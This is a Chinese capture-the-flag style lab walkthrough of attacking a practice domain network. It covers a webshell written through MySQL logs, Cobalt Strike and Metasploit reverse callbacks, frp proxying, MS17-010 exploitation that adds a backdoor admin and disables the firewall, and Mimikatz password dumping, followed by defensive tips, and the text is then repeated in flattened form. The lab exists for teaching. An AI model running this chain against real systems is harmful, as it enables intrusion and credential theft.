ATT&CK实战系列(一) - 内网靶场渗透实战教学文档

环境搭建

靶场拓扑

攻击机：Kali Linux (192.168.10.128)
靶机：
- Win7：外网(192.168.10.129) + 内网(192.168.52.143)
- Win2003：内网(192.168.52.141)
- Win Server(域控)：内网(192.168.52.138)

网络配置

Win7配置双网卡：
- 一张连接外网(192.168.10.0/24)
- 一张连接内网(192.168.52.0/24)
其他内网机器单网卡连接内网

环境验证

使用Kali ping Win7外网IP
使用Win7 ping内网机器
Win7开启phpstudy服务

外网渗透

信息收集

端口扫描：

nmap -p1-65535 -Pn -A -T4 192.168.10.129

发现80(HTTP)和3306(MySQL)端口开放

Web目录扫描：
使用dirsearch发现phpmyadmin目录

漏洞利用

phpMyAdmin弱口令登录：
- 用户名：root
- 密码：root
MySQL日志文件写shell：

-- 检查secure_file_priv设置
SHOW GLOBAL VARIABLES LIKE '%secure%';

-- 开启慢查询日志
SET GLOBAL slow_query_log=1;

-- 修改日志路径为Web目录
SET GLOBAL slow_query_log_file='C:/phpStudy/WWW/shell.php';

-- 写入PHP一句话木马
SELECT '<?php @eval($_POST[1]);?>' or sleep(10);

使用蚁剑连接Webshell：
- 密码：1
- 执行ipconfig发现内网IP

Cobalt Strike上线

生成木马并上传
通过蚁剑执行木马
CS监听81端口成功上线

内网渗透

信息收集

获取系统密码：
- hashdump获取哈希
- 使用Mimikatz获取明文密码
域信息收集：

net config workstation  # 确认域为god.org
net view  # 查看域内机器

MSF联动

设置监听：

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.10.128
set lport 8888
run

从CS生成Foreign HTTP Payload

内网代理

使用frp建立SOCKS5代理：

服务端配置(frps.ini)：
```
[common]
bind_port = 7000
```

客户端配置(frpc.ini)：

[common]
server_addr = 192.168.10.128
server_port = 7000

[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5

添加路由：

run autoroute -s 192.168.52.0/24
run autoroute -p

域成员渗透(Win2003)

端口扫描：

use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.141
set threads 100
run

发现135、445端口开放

检测MS17-010漏洞：

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.52.141
run

search ms17-010
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 192.168.52.141
run

添加用户并提权：

use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.141
set command "net user test hongrisec@2019 /add"
run

set command "net localgroup administrators test /add"
run

set command "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"
run

远程桌面连接：

proxychains rdesktop 192.168.52.141

域控渗透(Win Server)

端口扫描：

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.52.138
run

执行命令：

use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.138
set command "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"
run

set command "netsh firewall set opmode mode=disable"
run

使用获取的凭证登录
反弹shell：

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set rhosts 192.168.52.138
run

关键点总结

MySQL日志文件写shell绕过secure_file_priv限制
双网卡主机作为跳板进入内网
CS与MSF联动实现会话传递
使用frp建立稳定的内网代理通道
利用MS17-010漏洞横向移动
域环境下的信息收集和权限提升技巧

防御建议

禁用phpMyAdmin默认账号或使用强密码
配置MySQL的secure_file_priv为安全目录
及时安装系统补丁，特别是MS17-010
限制内网机器的出站连接
启用防火墙并配置严格的访问控制规则
监控异常账号创建和权限变更

ATT&CK实战系列(一) - 内网靶场渗透实战教学文档环境搭建靶场拓扑攻击机：Kali Linux (192.168.10.128) 靶机： Win7：外网(192.168.10.129) + 内网(192.168.52.143) Win2003：内网(192.168.52.141) Win Server(域控)：内网(192.168.52.138) 网络配置 Win7配置双网卡：一张连接外网(192.168.10.0/24) 一张连接内网(192.168.52.0/24) 其他内网机器单网卡连接内网环境验证使用Kali ping Win7外网IP 使用Win7 ping内网机器 Win7开启phpstudy服务外网渗透信息收集端口扫描：发现80(HTTP)和3306(MySQL)端口开放 Web目录扫描：使用dirsearch发现phpmyadmin目录漏洞利用 phpMyAdmin弱口令登录：用户名：root 密码：root MySQL日志文件写shell：使用蚁剑连接Webshell：密码：1 执行 ipconfig 发现内网IP Cobalt Strike上线生成木马并上传通过蚁剑执行木马 CS监听81端口成功上线内网渗透信息收集获取系统密码： hashdump 获取哈希使用Mimikatz获取明文密码域信息收集： MSF联动设置监听：从CS生成Foreign HTTP Payload 内网代理使用frp建立SOCKS5代理：服务端配置(frps.ini)：客户端配置(frpc.ini)：添加路由：域成员渗透(Win2003) 端口扫描：发现135、445端口开放检测MS17-010漏洞：添加用户并提权：远程桌面连接：域控渗透(Win Server) 端口扫描：执行命令：使用获取的凭证登录反弹shell：关键点总结 MySQL日志文件写shell绕过secure_ file_ priv限制双网卡主机作为跳板进入内网 CS与MSF联动实现会话传递使用frp建立稳定的内网代理通道利用MS17-010漏洞横向移动域环境下的信息收集和权限提升技巧防御建议禁用phpMyAdmin默认账号或使用强密码配置MySQL的secure_ file_ priv为安全目录及时安装系统补丁，特别是MS17-010 限制内网机器的出站连接启用防火墙并配置严格的访问控制规则监控异常账号创建和权限变更